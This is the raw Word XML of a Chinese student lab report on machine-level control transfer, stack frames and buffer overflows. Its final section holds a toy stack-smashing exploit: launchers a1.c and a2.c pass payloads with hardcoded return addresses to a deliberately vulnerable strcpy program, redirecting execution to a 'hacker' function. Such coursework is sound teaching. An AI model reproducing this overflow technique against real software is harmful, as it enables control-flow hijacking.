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240" w:afterLines="100" w:line="400" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0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实验四 程序控制结构实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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一、实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2775"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact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理解控制转移类指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2775"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact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了解机器级指令的实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2775"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact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理解过程调用的机器级表示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2775"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact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掌握过程调用中栈和栈帧的内容变化，理解过程调用的按值传递与按地址传递</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2775"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact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理解缓冲区溢出攻击，了解缓冲区溢出防范理解 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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二、实验环境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PC机，Linux 32-bit i386，C/汇编语言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gcc、objdump、gdb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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三、实验学时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="352" w:firstLineChars="168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4学时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="0"/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四、实验内容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4.1 实验内容一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控制转移指令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4.1.1 代码及编程思路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"stdio.h"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int sum(int a[],int n)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 int i,sum=0;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for (i=0;i&lt;n;i++)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sum+=a[i];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return sum;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main()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 int a[4]={1,2,3,4},n=3,x;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x=sum(a,n);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printf("sum=%d\n",x);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通过从main函数跳转到sum函数来加深对控制转移指令的理解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4.1.2 实验步骤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（2）使用指令分别对源程序进行预处理、编译、汇编和链接，最后生成可执行文件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（3）使用objdump指令进行反汇编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（4）使用gdb指令对程序进行调试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（5）运行可执行文件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4.1.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程序运行截图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872865" cy="79248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482850" cy="1449705"/>
            <wp:effectExtent l="0" t="0" r="127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555875" cy="116205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545715" cy="259588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544445" cy="27425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118995" cy="1732915"/>
            <wp:effectExtent l="0" t="0" r="146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811780" cy="386080"/>
            <wp:effectExtent l="0" t="0" r="762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4.1.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出现问题及解决办法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实验内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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栈和过程调用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.1 代码及编程思路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"stdio.h"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int swap(int *x,int *y)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int t=*x;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*x=*y;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*y=t;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main()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 int a=15,b=22;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swap(&amp;a,&amp;b);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printf("a=%d\tb=%d\n",a,b);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通过与按值传递的对比，可以有效理解按地址传递参数与之的区别，加深对栈和过程调用的理解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.2 实验步骤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（2）使用指令分别对源程序进行预处理、编译、汇编和链接，最后生成可执行文件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（3）使用objdump指令进行反汇编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（4）使用gdb指令对程序进行调试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（5）运行可执行文件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程序运行截图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995420" cy="1863090"/>
            <wp:effectExtent l="0" t="0" r="1270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244850" cy="2397125"/>
            <wp:effectExtent l="0" t="0" r="127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28670" cy="2195195"/>
            <wp:effectExtent l="0" t="0" r="88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48990" cy="47244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出现问题及解决办法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实验内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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缓冲区溢出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.1 代码及编程思路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代码：a.c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"stdio.h"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"string.h"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char code[]=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"0123456789abcdef";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 char *arg[3];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arg[0]="./b";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arg[1]=code;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arg[2]=NULL;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execve(arg[0],arg,NULL);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a1.c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"stdio.h"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"string.h"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char code[]=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"0123456789abcdef"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"abcdabcd"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"\x08\xde\xff\xff"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"\xb0\x91\x04\x08";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 char *arg[3];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arg[0]="./b";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arg[1]=code;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arg[2]=NULL;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execve(arg[0],arg,NULL);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a2.c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"stdio.h"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"string.h"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char code[]=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"0123456789abcdef"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"abcdabcd"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"\x88\xd0\xff\xff"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"\xb0\x91\x04\x08"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"\xed\x91\x04\x08";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 char *arg[3];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arg[0]="./b";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arg[1]=code;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arg[2]=NULL;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execve(arg[0],arg,NULL);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b.c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"stdio.h"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"string.h"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outputs(char *str)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 char buffer[16];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strcpy(buffer,str);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printf("%s\n",buffer);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hacker(void)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 printf("being hacked\n");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int main(int argc,char *argv[])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outputs(argv[1]);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printf("yes\n");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通过4个C文件逐步实现缓冲区溢出攻击，加深对缓冲区和栈帧的理解。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.2 实验步骤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（2）使用指令分别对源程序进行预处理、编译、汇编和链接，最后生成可执行文件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（3）使用objdump指令进行反汇编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（4）使用gdb指令对程序进行调试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（5）记录buffer中main的ebp值，hacker的首地址和outputs的返回地址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（6）修改程序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（7）使用指令分别对源程序进行预处理、编译、汇编和链接，最后生成可执行文件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（8）运行可执行文件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6191250" cy="436880"/>
            <wp:effectExtent l="0" t="0" r="1143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6187440" cy="1191895"/>
            <wp:effectExtent l="0" t="0" r="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988310" cy="1985010"/>
            <wp:effectExtent l="0" t="0" r="1397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995295" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="698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971800" cy="86169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rcRect b="3295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出现问题及解决办法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使用sysctl错误，应该注意是sysctl还是sysct1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk136958850"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>五、实验收获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>吐槽一下实验过程中的心路，如：通过实验，提醒自己以后编程要注意什么</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>弄懂控制转移类指令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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：这个实验让我得深入了解跳转、调用、返回这些控制转移指令怎么工作的。我意识到，写程序时，对这些控制流程的理解非常关键，尤其是写一些复杂的逻辑或者递归函数，正确使用这些指令真的很重要。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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>搞清楚栈和栈帧的内容变化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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：学习了栈帧的概念，以及它们在函数调用中的作用后，我认识到，管理好局部变量很关键，不然使用不当可能会引起栈溢出等问题。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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>搞懂缓冲区溢出攻击，学会怎么防范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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：缓冲区溢出是个挺严重的安全问题。通过实验，我学到了写安全代码的重要性，特别是处理字符串和数组时，要时刻小心不要访问到越界的内存。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6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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个实验不仅让我更深入地理解了计算机的底层原理，还提醒了我在编程时要更加注重细节，特别是内存管理、参数传递和安全防护这些方面。未来编程实践中，我会更小心地处理这些问题，写出更健壮、更安全的代码。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077" w:bottom="1440" w:left="1077" w:header="851" w:footer="992" w:gutter="0"/>
      <w:cols w:space="425" w:num="1"/>
      <w:docGrid w:linePitch="290" w:charSpace="-38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902AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="452902AC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91"/>
  <w:drawingGridVerticalSpacing w:val="14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MjhhNTU0ZTMwZWY5NzU5ZDQ4YWI2MTMzOTEzNGQifQ=="/>
    <w:docVar w:name="KSO_WPS_MARK_KEY" w:val="bd4e5cc8-37c4-4575-8bf9-26b376fe5149"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="008E1D2A"/>
    <w:rsid w:val="001014A1"/>
    <w:rsid w:val="0021638E"/>
    <w:rsid w:val="00295C9D"/>
    <w:rsid w:val="00444A5B"/>
    <w:rsid w:val="004D4E9B"/>
    <w:rsid w:val="00555C9E"/>
    <w:rsid w:val="00612A35"/>
    <w:rsid w:val="007C3E31"/>
    <w:rsid w:val="008E1D2A"/>
    <w:rsid w:val="00933413"/>
    <w:rsid w:val="009A58A0"/>
    <w:rsid w:val="009C52DB"/>
    <w:rsid w:val="00AD4517"/>
    <w:rsid w:val="00B22A8D"/>
    <w:rsid w:val="00B4434E"/>
    <w:rsid w:val="00BB52E5"/>
    <w:rsid w:val="00C25700"/>
    <w:rsid w:val="00C452D5"/>
    <w:rsid w:val="00CA4F74"/>
    <w:rsid w:val="00CB11CF"/>
    <w:rsid w:val="00D07FBF"/>
    <w:rsid w:val="00D766BF"/>
    <w:rsid w:val="00DE4CC4"/>
    <w:rsid w:val="00F12F70"/>
    <w:rsid w:val="00FC63EC"/>
    <w:rsid w:val="20DA18CD"/>
    <w:rsid w:val="612D59AA"/>
    <w:rsid w:val="74AB55DA"/>
    <w:rsid w:val="7FA3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正文文本缩进 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="3"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13">
    <w:name w:val="标题 1 字符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1249</Words>
  <Characters>2349</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2430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2023-06-06T06:43:00Z</dcterms:created>
  <dc:creator>zqiao</dc:creator>
  <cp:lastModifiedBy>逶迤</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-03T08:25:43Z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BB873A3C49EC4B39A2F69070DA16B16E</vt:lpwstr>
  </property>
</Properties>
</file>